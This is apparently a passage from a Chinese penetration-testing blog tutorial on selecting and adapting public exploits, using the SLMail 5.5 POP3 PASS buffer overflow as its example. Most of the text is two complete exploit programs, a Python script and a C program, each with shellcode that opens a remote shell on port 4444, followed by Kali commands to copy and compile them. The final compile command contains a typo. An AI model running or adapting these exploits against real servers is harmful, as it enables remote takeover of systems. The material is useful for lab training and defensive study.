选择和修改EXP 网公开的EXP代码 选择可信赖的EXP源 Exploit-db Secr
选择和修改EXP
网公开的EXP代码
选择可信赖的EXP源
Exploit-db
SecruityFocus
Searchsploit
有能力修改EXP(Python、Perl、Ruby、C、C++...)
www.securityfocus.com
选择和修改EXP
646.c
类unix坏境下编译
返回地址与我们的环境不符
反弹shell硬编码了回链IP地址
缓冲区偏移量与我们的环境不符
目标IP硬编码
root@kali:~# searchsploit slmail
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
SLMail 5.5 - POP3 PASS Buffer Overflow Explo | ./windows/remote/638.py
SLMail 5.5 - POP3 PASS Remote Buffer Overflo | ./windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit | ./windows/remote/646.c
SLMail Pro 6.3.1.0 - Multiple Remote Denial | ./windows/dos/31563.txt
--------------------------------------------- ----------------------------------
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/638.py .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/643.c .
root@kali:~# cp /usr/share/exploitdb/platforms/windows/remote/646.c .
root@kali:~# ls
638.py 643.c 646.c 公共 模板 视频 图片 文档 下载 音乐 桌面
╭────────────────────────────────────────────╮
[638.py]
########################################################## ## SLmail 5.5 POP3 PASS Buffer Overflow ## Discovered by : Muts ## Coded by : Muts ## www.offsec.com ## Plain vanilla stack overflow in the PASS command ## ########################################################### D:\Projects\BO>SLmail-5.5-POP3-PASS.py ########################################################### D:\Projects\BO>nc -v 192.168.1.167 4444 ## localhost.lan [192.168.1.167] 4444 (?) open # # Microsoft Windows 2000 [Version 5.00.2195] ## (C) Copyright 1985-2000 Microsoft Corp. ## C:\Program Files\SLmail\System> ##########################################################import structimport socketprint "\n\n###############################################"print "\nSLmail 5.5 POP3 PASS Buffer Overflow"print "\nFound & coded by muts [at] offsec.com"print "\nFor Educational Purposes Only!" print "\n\n###############################################"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"#Tested on Win2k SP4 Unpatched# Change ret address if neededbuffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc try:print "\nSending evil buffer..." s.connect(('192.168.1.167',110))data = s.recv(1024) s.send('USER username' +'\r\n')data = s.recv(1024) s.send('PASS ' + buffer + '\r\n')data = s.recv(1024) s.close()print "\nDone! Try connecting to port 4444 on victim machine."except:print "Could not connect to POP3!"# milw0rm.com [2004-11-18]
╰────────────────────────────────────────────╯
╭────────────────────────────────────────────╮
[646.c]
/*SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дуракнедействительный 31337 Team*/#include <string.h>#include <stdio.h>#include <winsock2.h>#include <windows.h>// [*] bind 4444 unsigned char shellcode[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45""\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49""\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d""\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66""\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61""\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40""\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32""\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6""\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09""\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0""\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff""\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53""\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff""\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64""\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89""\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab""\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51""\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53""\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6""\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";void exploit(int sock) { FILE *test; int *ptr; char userbuf[] = "USER madivan\r\n"; char evil[3001]; char buf[3012]; char receive[1024]; char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90"; memset(buf, 0x00, 3012); memset(evil, 0x00, 3001); memset(evil, 0x43, 3000); ptr = &evil; ptr = ptr + 652; // 2608 memcpy(ptr, &nopsled, 16); ptr = ptr + 4; memcpy(ptr, &shellcode, 317); *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP // banner recv(sock, receive, 200, 0); printf("[+] %s", receive); // user printf("[+] Sending Username...\n"); send(sock, userbuf, strlen(userbuf), 0); recv(sock, receive, 200, 0); printf("[+] %s", receive); // passwd printf("[+] Sending Evil buffer...\n"); sprintf(buf, "PASS %s\r\n", evil); //test = fopen("test.txt", "w"); //fprintf(test, "%s", buf); //fclose(test); send(sock, buf, strlen(buf), 0); printf("[*] Done! Connect to the host on port 4444...\n\n");}int connect_target(char *host, u_short port){ int sock = 0; struct hostent *hp; WSADATA wsa; struct sockaddr_in sa; WSAStartup(MAKEWORD(2,0), &wsa); memset(&sa, 0, sizeof(sa)); hp = gethostbyname(host); if (hp == NULL) { printf("gethostbyname() error!\n"); exit(0); } printf("[+] Connecting to %s\n", host); sa.sin_family = AF_INET; sa.sin_port = htons(port); sa.sin_addr = **((struct in_addr **) hp->h_addr_list); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) { printf("[-] socket blah?\n"); exit(0); } if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) {printf("[-] connect() blah!\n"); exit(0); } printf("[+] Connected to %s\n", host); return sock;}int main(int argc, char **argv){ int sock = 0; int data, port; printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); } port = 110; sock = connect_target(argv[1], port); exploit(sock); closesocket(sock); return 0;}
╰────────────────────────────────────────────╯
root@kali:~# gedit 638.py
root@kali:~# gedit 646.c
root@kali:~# gcc 646.c -0 646
选择和修改EXP
646.c
最低0.47元/天 解锁文章
3835
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
